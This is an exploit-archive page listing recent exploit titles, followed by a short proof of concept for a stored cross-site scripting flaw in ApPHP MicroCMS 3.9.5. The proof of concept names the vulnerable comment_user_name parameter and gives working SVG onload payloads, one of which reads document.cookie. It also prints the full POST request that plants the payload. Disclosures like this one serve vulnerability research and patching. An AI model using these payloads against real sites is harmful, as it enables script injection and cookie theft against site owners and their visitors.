01eb066d9d
11 new exploits IBM AIX 5.2/5.3 FTP Client - Local Buffer Overflow Yahoo! Widgets Engine 4.0.3 - YDPCTL.dll ActiveX Control Buffer Overflow Simple PHP Blog 0.8.4 - Cross-Site Request Forgery (Add Admin) Simple PHP Blog 0.8.4 - (Add Admin) Cross-Site Request Forgery miniblog 1.0.1 - Cross-Site Request Forgery (Add New Post) miniblog 1.0.1 - (Add New Post) Cross-Site Request Forgery PHP Press Release - Cross-Site Request Forgery (Add Admin) PHP Press Release - (Add Admin) Cross-Site Request Forgery Maian Weblog 4.0 - Cross-Site Request Forgery (Add New Post) Spacemarc News - Cross-Site Request Forgery (Add New Post) Minecraft Launcher - Insecure File Permissions Privilege Escalation Maian Weblog 4.0 - (Add New Post) Cross-Site Request Forgery Spacemarc News - (Add New Post) Cross-Site Request Forgery Minecraft Launcher 1.6.61 - Insecure File Permissions Privilege Escalation sheed AntiVirus - Unquoted Service Path Privilege Escalation AVTECH IP Camera_ NVR_ and DVR Devices - Multiple Vulnerabilities sheed AntiVirus 2.3 - Unquoted Service Path Privilege Escalation AVTECH IP Camera_ NVR_ and DVR Devices - Multiple Vulnerabilities Linux Kernel 3.13.1 - Recvmmsg Privilege Escalation (Metasploit) Linux Kernel 3.13.1 - 'Recvmmsg' Privilege Escalation (Metasploit) ApPHP MicroBlog 1.0.2 - Cross-Site Request Forgery (Add New Author) ApPHP MicroBlog 1.0.2 - (Add New Author) Cross-Site Request Forgery Subversion 1.6.6 / 1.6.12 - Code Execution Cisco Webex Player T29.10 - '.WRF' Use-After-Free Memory Corruption Cisco Webex Player T29.10 - '.ARF' Out-of-Bounds Memory Corruption Adobe Flash Player 23.0.0.162 - '.SWF' ConstantPool Critical Memory Corruption Categorizator 0.3.1 - SQL Injection NetBilletterie 2.8 - Multiple Vulnerabilities ApPHP MicroCMS 3.9.5 - Stored Cross Site Scripting OpenCimetiere v3.0.0-a5 - Blind SQL Injection Android - Binder Generic ASLR Leak ApPHP MicroCMS 3.9.5 - (Add Admin) Cross-Site Request Forgery
37 lines
1.2 KiB
Text
Executable file
37 lines
1.2 KiB
Text
Executable file
# Exploit Title :----------------- : ApPHP MicroCMS 3.9.5 - Stored Cross Site Scripting
|
|
# Author :------------------------ : Besim
|
|
# Google Dork :---------------- : -
|
|
# Date :-------------------------- : 12/10/2016
|
|
# Type :-------------------------- : webapps
|
|
# Platform : -------------------- : PHP
|
|
# Vendor Homepage :------- : http://www.apphp.com
|
|
# Software link : -------------- : https://www.apphp.com/customer/index.php?page=free-products
|
|
|
|
-*-*-*-*-*-*-*-*- Description -*-*-*-*-*-*-*-*-
|
|
|
|
*-* Vulnerable link : http://site_name/path/index.php?page=pages&pid=
|
|
|
|
*-* Stored XSS Payload ( Comments ):
|
|
|
|
# Vulnerable URL : http://site_name/path/index.php?page=posts&post_id= - Post comment section
|
|
# Vuln. Parameter : comment_user_name
|
|
# Payload : <svg/onload=prompt(7);//>
|
|
|
|
|
|
############ POST DATA ############
|
|
|
|
task=publish_comment &
|
|
comment_id=
|
|
& article_id=13
|
|
&user_id=
|
|
&token=212529c97855409e56c0e333721461df
|
|
&comment_user_name=<svg/onload=prompt(document.cookie);//>
|
|
&comment_user_email=meryem@yopmai.com
|
|
&comment_text=skdLSJDLKSDKJ
|
|
&captcha_code=w7AG
|
|
&btnSubmitPC=Publish your comment
|
|
|
|
############ ########## ############
|
|
|
|
|
|
*-* Thanks Meryem AKDOĞAN *-*
|